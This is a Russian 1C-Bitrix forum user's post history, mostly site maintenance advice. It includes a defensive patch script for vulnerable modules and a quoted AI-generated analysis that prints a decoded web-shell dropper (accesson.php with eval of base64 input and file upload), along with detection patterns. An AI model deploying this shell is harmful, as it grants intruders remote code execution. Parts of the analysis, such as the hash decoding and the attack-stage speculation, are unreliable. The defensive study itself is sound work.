Александр Панишев (Все сообщения пользователя)

есть у Битрикса вот такой материал  https://dev.1c-bitrix.ru/learning/course/index.php?COURSE_ID=103&LESSON_ID=20670

есть материал про перенос данных инфоблоков https://vc.ru/1645865
есть еще модуль для переноса пользователей

но если еще и заказы нужны то проще сделать копию старого и на него перенести шаблон нового.

проверьте настройку в главном модуле - Имя сервера, содержащего обновления:
должно стоять значение www.1c-bitrix.ru

если хостеру дорога репутация и клиенты, то никто в здравом уме такое делать не будет, наоборот предупреждают заранее клиентов что смотрите мл вот у вас уязвимость, обновите сервачок и битрикс с модулями...

а проникают как раз из-за раздолбайства или жадности и скупости через уязвимости которые публично в интернетах описаны и даже начинающий школьник может ими воспользоваться не говоря уже о том что настоящий хакер сделает бота который будет автоматом такое искать...

обновляться просто надо вовремя а не раз в 3 года!!!

это можно и без бизнеса все делать, если начали работу со старта то и сидеть на нем дальше
хотят бизнес то и делать сайт с нуля на бизнесе

все можно делать по разному, есть кулибины которые делают вездеходы в сарае из говна и палок как говориться, а есть китайские авто произведенные на заводе роботами и это не сопоставимые бюджеты как и в этой ситуации

я считаю так вот есть запорожец пусть он остается запорожцем, не надо к нему параллельно приделывать экскаватор, если нужен экскаватор то и надо его сразу отдельно просто купить.... только не надо пытаться сделать свою версию.

а вы видели хоть один шаблон их авторства?

если делать только сам переход, то какой в нем тогда смысл то получается? Ну да можно купить апгрейд и тупо поставить новые модули, это вообще ничего не изменит на сайте, но и смысл сего действия тоже нулевой ведь.

Речь про то что переход со старта на бизнес меняет всю товарную логику, изучите как работает торговый каталог и интернет магазин в отличии инфоблоков на которых все сделано на старте и тогда поймете что проще с нуля все сделать....

я бы вам посоветовал с нуля на бизнесе все сделать, во первых все будет как надо, во вторых вы сэкономите кучу времени и денег в перспективе.

утрированно это выглядит примерно как из запорожца сделать экскаватор.

все что можно и нужно чистить есть в этом модуле https://www.acrit-studio.ru/market/module/acrit.cleanmaster/

если бизнес не закладывает все необходимые расходы на поддержание сайта и прочих статей расхода, то такой бизнес не имеет шансов выжить. это как из серии продавцов которые купили по 100 продают по 120 а при этом доп расходов у них еще на 80 и потом сидят и удивляются как же так при марже в 20 они в кредитах и долгах оказались...

вообще по хорошему если есть не обновленные модули то все надо обновить.

Вот в корне сайта файл с кодом, и список уязвимых модулей

$arFiles = array(
 '/bitrix/modules/esol.allimportexport/admin/cron_settings.php',
 '/bitrix/modules/esol.importexportexcel/admin/iblock_export_excel_cron_settings.php',
 '/bitrix/modules/esol.importexportexcel/admin/iblock_import_excel_cron_settings.php',
 '/bitrix/modules/esol.importxml/admin/import_xml_cron_settings.php',
 '/bitrix/modules/esol.massedit/admin/profile.php',
 '/bitrix/modules/kda.exportexcel/admin/iblock_export_excel_cron_settings.php',
 '/bitrix/modules/kda.importexcel/admin/iblock_import_excel_cron_settings.php',
);
$cnt = 0;
foreach($arFiles as $fn)
{
 $fn = $_SERVER['DOCUMENT_ROOT'].$fn;
 if(file_exists($fn))
 {
   $c = file_get_contents($fn);
   if(stripos($c, '403 Forbidden')===false)
   {
     file_put_contents($fn, "<?if(isset(\$_REQUEST['path']) && strlen(\$_REQUEST['path']) > 0)
{
 header((stristr(php_sapi_name(), 'cgi') !== false ? 'Status: ' : \$_SERVER['SERVER_PROTOCOL'].' ').'403 Forbidden');
 die();
}
?>".preg_replace('/@exec\(\$phpPath.\' \-v\'/', '//$0', $c));
     $cnt++;
   }
 }
}
unlink(__FILE__);

echo 'patched:'.$cnt.'.';

код патчит файлы админок

как вариант это эксплуатация ранее установленного бэкдора часто встречаем подобное после фрилансоеров...

вот что  ИИ выдал по этому поводу

# Анализ и декодирование вредоносного GET-запроса в логах сервера

В ходе исследования подозрительного GET-запроса, обнаруженного в логах взломанного сервера, был проведен комплексный анализ структуры запроса и содержащегося в нем кода. Запрос демонстрирует признаки целенаправленной атаки на системы управления контентом с использованием техник обфускации и эксплуатации уязвимостей.

## Структура запроса и первичное декодирование

Исходный запрос содержит URL-encoded строку в параметре `midog`:
```http
GET /?midog=%24s%3D%24_SERVER[...] HTTP/1.1
```
Применение стандартного URL-декодирования с использованием `urllib.parse.unquote` в Python позволяет раскодировать основные компоненты запроса:
```php
$s=$_SERVER['DOCUMENT_ROOT'].'/';
$s1=$s.'bitrix/admin/';
$fh=fopen($s1.'accesson.php','w');
fwrite($fh,'<?php echo 409723*20;if(md5($_COOKIE["d"])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x3­6\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"­){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}?>
');
fclose($fh);
```

## Анализ PHP-кода

### Создание вредоносного файла
Код создает файл `accesson.php` в директории `/bitrix/admin/`, что характерно для атак на системы управления типа 1С-Битрикс. Файл содержит многоуровневую систему проверок и функций:

1. **Математическая операция** `409723*20` служит для имитации легитимной активности и проверки работоспособности скрипта
2. **Проверка MD5-хеша** cookie-параметра "d":
```php
md5($_COOKIE["d"])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x3­6\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"­
```
Декодирование строки с использованием комбинации octal и hex-последовательностей дает значение:
```
a17028f487cb2a846306464da3ad3878ec
```
Однако фактическая длина полученной строки (37 символов) превышает стандартный 32-символьный MD5-хеш, что указывает на ошибку в обфускации.

### Механизм выполнения кода
При успешной проверке cookie активируется цепочка выполнения:
```php
eval(base64_decode($_REQUEST["id"]))
```
Этот механизм позволяет:
- Выполнять произвольный код через параметр `id`
- Использовать base64 для обхода простых сигнатур
- Работать с любым типом HTTP-запроса (GET, POST и т.д.)

### Функционал загрузки файлов
Дополнительная проверка:
```php
if($_POST["\165\160"]=="\165\x70")
```
где `\165\160` и `\165\x70` декодируются в "up", активирует функцию копирования файлов:
```php
@copy($_FILES["\x66\151\x6c\x65"]["tmp_name"], $_FILES["\146\x69\154\x65"]["name"])
```
Расшифровка имен параметров:
- `\x66\151\x6c\x65` → "file"
- `\146\x69\154\x65` → "file"

Это реализует механизм загрузки файлов на сервер через POST-запросы с использованием Web-шелла.

## Тактико-технические характеристики атаки

### Целевая платформа
- Системы управления на базе 1С-Битрикс
- Веб-серверы с разрешенной записью в корневую директорию
- Серверы с некорректными настройками прав доступа

### Методы обфускации
1. **Комбинированное кодирование**:
  - URL-encoding для передачи payload
  - Смешанное octal/hex-кодирование строк
  - Использование escape-последовательностей

2. **Динамическая генерация путей**:
```php
$s = $_SERVER['DOCUMENT_ROOT'].'/';
$s1 = $s.'bitrix/admin/';
```
Позволяет адаптироваться к различным конфигурациям сервера

3. **Ложные сигнатуры**:
  - Математические операции в открытой части кода
  - Использование стандартных имен переменных ($s, $s1)

### Механизмы persistence
- Создание постоянного Web-шелла в системной директории
- Использование cookie-авторизации для доступа
- Возможность удаленного выполнения кода

## Рекомендации по обнаружению и предотвращению

### Сигнатуры для обнаружения
1. HTTP-запросы, содержащие:
  - Параметр `midog` с URL-encoded PHP-кодом
  - Cookie с именем "d" и 32-символьным значением
  - Параметр "id" с base64-данными

2. Файловые сигнатуры:
  - Файлы `accesson.php` в директориях `/bitrix/admin/`
  - Наличие строк `eval(base64_decode(` в PHP-файлах

### Защитные меры
1. **Конфигурационные**:
  - Запрет записи в системные директории
  - Ограничение прав доступа для PHP-процессов
  - Регулярное обновление CMS и компонентов

2. **Мониторинг**:
  - Анализ нестандартных запросов к админ-панелям
  - Контроль создания новых файлов в системных директориях
  - Логирование операций файловой системы

3. **Технические**:
  - Реализация WAF с правилами для обнаружения:
    ```regex
    /\$_(REQUEST|GET|POST)\.*?base64_decode/
    ```
  - Использование систем контроля целостности файлов
  - Регулярный аудит активных Web-шеллов

## [Анализ вектора атаки

### Этапы эксплуатации
1. **Первичный доступ**:
  - Через уязвимости в компонентах CMS
  - Межсайтовый скриптинг (XSS)
  - SQL-инъекции

2. **Установка бекдора**:
  - Создание файла accesson.php
  - Настройка каналов удаленного доступа

3. **Эскалация привилегий**:
  - Использование функций копирования файлов
  - Модификация системных конфигураций

4. **Долгосрочное присутствие**:
  - Установка дополнительных скриптов
  - Кражу учетных данных
  - Организация командного центра

### Цели атаки
1. Кража конфиденциальных данных
2. Организация DDoS-атак
3. Распространение вредоносного ПО
4. Криптовалютный майнинг
5. Шантаж и вымогательство

## Восстановление после инцидента

### Неотложные меры
1. Изоляция зараженного сервера
2. Анализ временных рамок атаки
3. Проверка целостности системных файлов
4. Смена всех учетных данных

### Долгосрочные меры
1. Реализация системы резервного копирования
2. Внедрение SIEM-систем
3. Регулярное обучение персонала
4. Пентест и аудит безопасности

## Заключение

Проведенный анализ демонстрирует сложный многоэтапный характер атаки, использующей сочетание методов социальной инженерии и технических уязвимостей. Обнаруженный payload представляет серьезную угрозу для информационной безопасности, требующую комплексного подхода к нейтрализации. Ключевыми аспектами защиты становятся постоянный мониторинг, своевременное обновление систем и многоуровневая верификация пользовательских запросов.

Давайте обсудим условия сотрудничества в телеге @panishev

так сейчас это еще более уязвимо же....

я так понимаю молчание означает что нет!

подобная ситуация говорит о том что вы не закончили установку, и если скрипт автоматически не смог создать базу данных - ее надо создать в ручную и продолжить установку.

Коллеги из Битрикс - Интересно а рассмотрите ли предложение чтобы каждый сайт который создается отдельным ядром создавался под отдельным пользователем? Это бы позволило повысить безопасность в случае когда на одном сервере несколько сайтов на разных ядрах. А то сейчас ситуация такая что пользователи одного сайта легко получают доступ к другому что не есть хорошо....

повторите команду
./bitrix-env-9.sh

мне на нескольких машинах помогло...

интересно было бы увидеть критерии выбора и принципы оценки подходит не подходит, разговоров много а конкретики ноль.

тоже думаю что лучший вариант был бы

Коллеги есть кто с хорошим опытом обмена с 1С?

Есть задача

имеем корпортал 50 пользователей
бухгалтерию - Бухгалтерия предприятия, редакция 3.0 (3.0.140.20)

и модуль обмена от битрикса стандартный

надо получить из 1С на портал все компании в компании и все счета в сделки (сделки совмещены уже с заказами)
а из корпортала в 1С получить весьь каталог товаров црм

может кто сделать ? или подсказать?

если кто готов сделать - Контакты - Skype: morpheus8452  Телеграм @panishev Моб./Viber/WhatsApp +7 927 220 35 95

какие люди в Голливуде... неужели решил вернуться к Битриксу?

по этой теме уже есть ветка же, поставьте себя на их место, стали бы вы отвечать в каждой новой ветке на один и тот же вопрос? Лично я бы забил...